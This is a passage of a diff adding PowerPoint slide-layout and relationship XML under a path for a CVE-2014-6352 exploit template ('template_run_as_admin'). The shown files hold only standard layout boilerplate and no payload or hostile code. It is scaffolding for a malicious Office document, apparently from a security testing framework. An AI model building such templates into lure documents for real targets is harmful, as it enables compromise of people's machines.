algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"><a:defRPr sz="1800" kern="1200"><a:solidFill><a:schemeClr val="tx1"/></a:solidFill><a:latin typeface="+mn-lt"/><a:ea typeface="+mn-ea"/><a:cs typeface="+mn-cs"/></a:defRPr></a:lvl7pPr><a:lvl8pPr marL="3200400" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"><a:defRPr sz="1800" kern="1200"><a:solidFill><a:schemeClr val="tx1"/></a:solidFill><a:latin typeface="+mn-lt"/><a:ea typeface="+mn-ea"/><a:cs typeface="+mn-cs"/></a:defRPr></a:lvl8pPr><a:lvl9pPr marL="3657600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"><a:defRPr sz="1800" kern="1200"><a:solidFill><a:schemeClr val="tx1"/></a:solidFill><a:latin typeface="+mn-lt"/><a:ea typeface="+mn-ea"/><a:cs typeface="+mn-cs"/></a:defRPr></a:lvl9pPr></p:defaultTextStyle><p:extLst><p:ext uri="{EFAFB233-063F-42B5-8137-9DF3F51BA10A}"><p15:sldGuideLst xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" xmlns="">
+                <p15:guide id="1" orient="horz" pos="2160">
+                    <p15:clr>
+                        <a:srgbClr val="A4A3A4"/>
+                    </p15:clr>
+                </p15:guide>
+                <p15:guide id="2" pos="2880">
+                    <p15:clr>
+                        <a:srgbClr val="A4A3A4"/>
+                    </p15:clr>
+                </p15:guide>
+            </p15:sldGuideLst></p:ext></p:extLst></p:presentation>
--- a/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout1.xml.rels
+++ b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout1.xml.rels
@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster1.xml"/></Relationships>
--- a/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout10.xml.rels
+++ b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout10.xml.rels
@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster1.xml"/></Relationships>
--- a/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout11.xml.rels
+++ b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout11.xml.rels
@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster1.xml"/></Relationships>
--- a/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout2.xml.rels
+++ b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout2.xml.rels
@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster1.xml"/></Relationships>
--- a/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout3.xml.rels
+++ b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout3.xml.rels
@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster1.xml"/></Relationships>
--- a/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout4.xml.rels
+++ b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout4.xml.rels
@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster1.xml"/></Relationships>
--- a/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout5.xml.rels
+++ b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout5.xml.rels
@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster1.xml"/></Relationships>
--- a/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout6.xml.rels
+++ b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout6.xml.rels
@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster1.xml"/></Relationships>
--- a/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout7.xml.rels
+++ b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout7.xml.rels
@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster1.xml"/></Relationships>
--- a/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout8.xml.rels
+++ b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout8.xml.rels
@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster1.xml"/></Relationships>
--- a/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout9.xml.rels
+++ b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout9.xml.rels
@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster1.xml"/></Relationships>
--- a/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout1.xml
+++ b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout1.xml
@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<p:sldLayout xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" type="title" preserve="1"><p:cSld name="Title Slide"><p:spTree><p:nvGrpSpPr><p:cNvPr id="1" name=""/><p:cNvGrpSpPr/><p:nvPr/></p:nvGrpSpPr><p:grpSpPr><a:xfrm><a:off x="0" y="0"/><a:ext cx="0" cy="0"/><a:chOff x="0" y="0"/><a:chExt cx="0" cy="0"/></a:xfrm></p:grpSpPr><p:sp><p:nvSpPr><p:cNvPr id="2" name="Title 1"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="ctrTitle"/></p:nvPr></p:nvSpPr><p:spPr><a:xfrm><a:off x="685800" y="2130425"/><a:ext cx="7772400" cy="1470025"/></a:xfrm></p:spPr><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Click to edit Master title style</a:t></a:r><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="3" name="Subtitle 2"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="subTitle" idx="1"/></p:nvPr></p:nvSpPr><p:spPr><a:xfrm><a:off x="1371600" y="3886200"/><a:ext cx="6400800" cy="1752600"/></a:xfrm></p:spPr><p:txBody><a:bodyPr/><a:lstStyle><a:lvl1pPr marL="0" indent="0" algn="ctr"><a:buNone/><a:defRPr><a:solidFill><a:schemeClr val="tx1"><a:tint val="75000"/></a:schemeClr></a:solidFill></a:defRPr></a:lvl1pPr><a:lvl2pPr marL="457200" indent="0" algn="ctr"><a:buNone/><a:defRPr><a:solidFill><a:schemeClr val="tx1"><a:tint val="75000"/></a:schemeClr></a:solidFill></a:defRPr></a:lvl2pPr><a:lvl3pPr marL="914400" indent="0" algn="ctr"><a:buNone/><a:defRPr><a:solidFill><a:schemeClr val="tx1"><a:tint val="75000"/></a:schemeClr></a:solidFill></a:defRPr></a:lvl3pPr><a:lvl4pPr marL="1371600" indent="0" algn="ctr"><a:buNone/><a:defRPr><a:solidFill><a:schemeClr val="tx1"><a:tint val="75000"/></a:schemeClr></a:solidFill></a:defRPr></a:lvl4pPr><a:lvl5pPr marL="1828800" indent="0" algn="ctr"><a:buNone/><a:defRPr><a:solidFill><a:schemeClr val="tx1"><a:tint val="75000"/></a:schemeClr></a:solidFill></a:defRPr></a:lvl5pPr><a:lvl6pPr marL="2286000" indent="0" algn="ctr"><a:buNone/><a:defRPr><a:solidFill><a:schemeClr val="tx1"><a:tint val="75000"/></a:schemeClr></a:solidFill></a:defRPr></a:lvl6pPr><a:lvl7pPr marL="2743200" indent="0" algn="ctr"><a:buNone/><a:defRPr><a:solidFill><a:schemeClr val="tx1"><a:tint val="75000"/></a:schemeClr></a:solidFill></a:defRPr></a:lvl7pPr><a:lvl8pPr marL="3200400" indent="0" algn="ctr"><a:buNone/><a:defRPr><a:solidFill><a:schemeClr val="tx1"><a:tint val="75000"/></a:schemeClr></a:solidFill></a:defRPr></a:lvl8pPr><a:lvl9pPr marL="3657600" indent="0" algn="ctr"><a:buNone/><a:defRPr><a:solidFill><a:schemeClr val="tx1"><a:tint val="75000"/></a:schemeClr></a:solidFill></a:defRPr></a:lvl9pPr></a:lstStyle><a:p><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Click to edit Master subtitle style</a:t></a:r><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="4" name="Date Placeholder 3"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="dt" sz="half" idx="10"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:fld id="{A3E2BFEF-B464-43B7-BACB-B80E2ED36959}" type="datetimeFigureOut"><a:rPr lang="en-US" smtClean="0"/><a:pPr/><a:t>11/12/2014</a:t></a:fld><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="5" name="Footer Placeholder 4"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="ftr" sz="quarter" idx="11"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="6" name="Slide Number Placeholder 5"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="sldNum" sz="quarter" idx="12"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:fld id="{FDE0A223-AA89-463D-95C0-64ABE7403E02}" type="slidenum"><a:rPr lang="en-US" smtClean="0"/><a:pPr/><a:t>‹#›</a:t></a:fld><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp></p:spTree></p:cSld><p:clrMapOvr><a:masterClrMapping/></p:clrMapOvr></p:sldLayout>
--- a/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout10.xml
+++ b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout10.xml
@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<p:sldLayout xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" type="vertTx" preserve="1"><p:cSld name="Title and Vertical Text"><p:spTree><p:nvGrpSpPr><p:cNvPr id="1" name=""/><p:cNvGrpSpPr/><p:nvPr/></p:nvGrpSpPr><p:grpSpPr><a:xfrm><a:off x="0" y="0"/><a:ext cx="0" cy="0"/><a:chOff x="0" y="0"/><a:chExt cx="0" cy="0"/></a:xfrm></p:grpSpPr><p:sp><p:nvSpPr><p:cNvPr id="2" name="Title 1"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="title"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Click to edit Master title style</a:t></a:r><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="3" name="Vertical Text Placeholder 2"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="body" orient="vert" idx="1"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr vert="eaVert"/><a:lstStyle/><a:p><a:pPr lvl="0"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Click to edit Master text styles</a:t></a:r></a:p><a:p><a:pPr lvl="1"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Second level</a:t></a:r></a:p><a:p><a:pPr lvl="2"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Third level</a:t></a:r></a:p><a:p><a:pPr lvl="3"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Fourth level</a:t></a:r></a:p><a:p><a:pPr lvl="4"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Fifth level</a:t></a:r><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="4" name="Date Placeholder 3"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="dt" sz="half" idx="10"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:fld id="{A3E2BFEF-B464-43B7-BACB-B80E2ED36959}" type="datetimeFigureOut"><a:rPr lang="en-US" smtClean="0"/><a:pPr/><a:t>11/12/2014</a:t></a:fld><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="5" name="Footer Placeholder 4"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="ftr" sz="quarter" idx="11"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="6" name="Slide Number Placeholder 5"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="sldNum" sz="quarter" idx="12"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:fld id="{FDE0A223-AA89-463D-95C0-64ABE7403E02}" type="slidenum"><a:rPr lang="en-US" smtClean="0"/><a:pPr/><a:t>‹#›</a:t></a:fld><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp></p:spTree></p:cSld><p:clrMapOvr><a:masterClrMapping/></p:clrMapOvr></p:sldLayout>
--- a/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout11.xml
+++ b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout11.xml
@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<p:sldLayout xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" type="vertTitleAndTx" preserve="1"><p:cSld name="Vertical Title and Text"><p:spTree><p:nvGrpSpPr><p:cNvPr id="1" name=""/><p:cNvGrpSpPr/><p:nvPr/></p:nvGrpSpPr><p:grpSpPr><a:xfrm><a:off x="0" y="0"/><a:ext cx="0" cy="0"/><a:chOff x="0" y="0"/><a:chExt cx="0" cy="0"/></a:xfrm></p:grpSpPr><p:sp><p:nvSpPr><p:cNvPr id="2" name="Vertical Title 1"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="title" orient="vert"/></p:nvPr></p:nvSpPr><p:spPr><a:xfrm><a:off x="6629400" y="274638"/><a:ext cx="2057400" cy="5851525"/></a:xfrm></p:spPr><p:txBody><a:bodyPr vert="eaVert"/><a:lstStyle/><a:p><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Click to edit Master title style</a:t></a:r><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="3" name="Vertical Text Placeholder 2"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="body" orient="vert" idx="1"/></p:nvPr></p:nvSpPr><p:spPr><a:xfrm><a:off x="457200" y="274638"/><a:ext cx="6019800" cy="5851525"/></a:xfrm></p:spPr><p:txBody><a:bodyPr vert="eaVert"/><a:lstStyle/><a:p><a:pPr lvl="0"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Click to edit Master text styles</a:t></a:r></a:p><a:p><a:pPr lvl="1"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Second level</a:t></a:r></a:p><a:p><a:pPr lvl="2"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Third level</a:t></a:r></a:p><a:p><a:pPr lvl="3"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Fourth level</a:t></a:r></a:p><a:p><a:pPr lvl="4"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Fifth level</a:t></a:r><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="4" name="Date Placeholder 3"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="dt" sz="half" idx="10"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:fld id="{A3E2BFEF-B464-43B7-BACB-B80E2ED36959}" type="datetimeFigureOut"><a:rPr lang="en-US" smtClean="0"/><a:pPr/><a:t>11/12/2014</a:t></a:fld><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="5" name="Footer Placeholder 4"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="ftr" sz="quarter" idx="11"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="6" name="Slide Number Placeholder 5"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="sldNum" sz="quarter" idx="12"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:fld id="{FDE0A223-AA89-463D-95C0-64ABE7403E02}" type="slidenum"><a:rPr lang="en-US" smtClean="0"/><a:pPr/><a:t>‹#›</a:t></a:fld><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp></p:spTree></p:cSld><p:clrMapOvr><a:masterClrMapping/></p:clrMapOvr></p:sldLayout>
--- a/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout2.xml
+++ b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout2.xml
@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<p:sldLayout xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" type="obj" preserve="1"><p:cSld name="Title and Content"><p:spTree><p:nvGrpSpPr><p:cNvPr id="1" name=""/><p:cNvGrpSpPr/><p:nvPr/></p:nvGrpSpPr><p:grpSpPr><a:xfrm><a:off x="0" y="0"/><a:ext cx="0" cy="0"/><a:chOff x="0" y="0"/><a:chExt cx="0" cy="0"/></a:xfrm></p:grpSpPr><p:sp><p:nvSpPr><p:cNvPr id="2" name="Title 1"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="title"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Click to edit Master title style</a:t></a:r><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="3" name="Content Placeholder 2"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph idx="1"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:pPr lvl="0"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Click to edit Master text styles</a:t></a:r></a:p><a:p><a:pPr lvl="1"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Second level</a:t></a:r></a:p><a:p><a:pPr lvl="2"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Third level</a:t></a:r></a:p><a:p><a:pPr lvl="3"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Fourth level</a:t></a:r></a:p><a:p><a:pPr lvl="4"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Fifth level</a:t></a:r><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="4" name="Date Placeholder 3"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="dt" sz="half" idx="10"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:fld id="{A3E2BFEF-B464-43B7-BACB-B80E2ED36959}" type="datetimeFigureOut"><a:rPr lang="en-US" smtClean="0"/><a:pPr/><a:t>11/12/2014</a:t></a:fld><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="5" name="Footer Placeholder 4"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="ftr" sz="quarter" idx="11"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="6" name="Slide Number Placeholder 5"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="sldNum" sz="quarter" idx="12"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:fld id="{FDE0A223-AA89-463D-95C0-64ABE7403E02}" type="slidenum"><a:rPr lang="en-US" smtClean="0"/><a:pPr/><a:t>‹#›</a:t></a:fld><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp></p:spTree></p:cSld><p:clrMapOvr><a:masterClrMapping/></p:clrMapOvr></p:sldLayout>
--- a/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout3.xml
+++ b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout3.xml
@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<p:sldLayout xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" type="secHead" preserve="1"><p:cSld name="Section Header"><p:spTree><p:nvGrpSpPr><p:cNvPr id="1" name=""/><p:cNvGrpSpPr/><p:nvPr/></p:nvGrpSpPr><p:grpSpPr><a:xfrm><a:off x="0" y="0"/><a:ext cx="0" cy="0"/><a:chOff x="0" y="0"/><a:chExt cx="0" cy="0"/></a:xfrm></p:grpSpPr><p:sp><p:nvSpPr><p:cNvPr id="2" name="Title 1"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="title"/></p:nvPr></p:nvSpPr><p:spPr><a:xfrm><a:off x="722313" y="4406900"/><a:ext cx="7772400" cy="1362075"/></a:xfrm></p:spPr><p:txBody><a:bodyPr anchor="t"/><a:lstStyle><a:lvl1pPr algn="l"><a:defRPr sz="4000" b="1" cap="all"/></a:lvl1pPr></a:lstStyle><a:p><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Click to edit Master title style</a:t></a:r><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="3" name="Text Placeholder 2"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="body" idx="1"/></p:nvPr></p:nvSpPr><p:spPr><a:xfrm><a:off x="722313" y="2906713"/><a:ext cx="7772400" cy="1500187"/></a:xfrm></p:spPr><p:txBody><a:bodyPr anchor="b"/><a:lstStyle><a:lvl1pPr marL="0" indent="0"><a:buNone/><a:defRPr sz="2000"><a:solidFill><a:schemeClr val="tx1"><a:tint val="75000"/></a:schemeClr></a:solidFill></a:defRPr></a:lvl1pPr><a:lvl2pPr marL="457200" indent="0"><a:buNone/><a:defRPr sz="1800"><a:solidFill><a:schemeClr val="tx1"><a:tint val="75000"/></a:schemeClr></a:solidFill></a:defRPr></a:lvl2pPr><a:lvl3pPr marL="914400" indent="0"><a:buNone/><a:defRPr sz="1600"><a:solidFill><a:schemeClr val="tx1"><a:tint val="75000"/></a:schemeClr></a:solidFill></a:defRPr></a:lvl3pPr><a:lvl4pPr marL="1371600" indent="0"><a:buNone/><a:defRPr sz="1400"><a:solidFill><a:schemeClr val="tx1"><a:tint val="75000"/></a:schemeClr></a:solidFill></a:defRPr></a:lvl4pPr><a:lvl5pPr marL="1828800" indent="0"><a:buNone/><a:defRPr sz="1400"><a:solidFill><a:schemeClr val="tx1"><a:tint val="75000"/></a:schemeClr></a:solidFill></a:defRPr></a:lvl5pPr><a:lvl6pPr marL="2286000" indent="0"><a:buNone/><a:defRPr sz="1400"><a:solidFill><a:schemeClr val="tx1"><a:tint val="75000"/></a:schemeClr></a:solidFill></a:defRPr></a:lvl6pPr><a:lvl7pPr marL="2743200" indent="0"><a:buNone/><a:defRPr sz="1400"><a:solidFill><a:schemeClr val="tx1"><a:tint val="75000"/></a:schemeClr></a:solidFill></a:defRPr></a:lvl7pPr><a:lvl8pPr marL="3200400" indent="0"><a:buNone/><a:defRPr sz="1400"><a:solidFill><a:schemeClr val="tx1"><a:tint val="75000"/></a:schemeClr></a:solidFill></a:defRPr></a:lvl8pPr><a:lvl9pPr marL="3657600" indent="0"><a:buNone/><a:defRPr sz="1400"><a:solidFill><a:schemeClr val="tx1"><a:tint val="75000"/></a:schemeClr></a:solidFill></a:defRPr></a:lvl9pPr></a:lstStyle><a:p><a:pPr lvl="0"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Click to edit Master text styles</a:t></a:r></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="4" name="Date Placeholder 3"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="dt" sz="half" idx="10"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:fld id="{A3E2BFEF-B464-43B7-BACB-B80E2ED36959}" type="datetimeFigureOut"><a:rPr lang="en-US" smtClean="0"/><a:pPr/><a:t>11/12/2014</a:t></a:fld><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="5" name="Footer Placeholder 4"/><p:cNvSpPr><a:spLocks 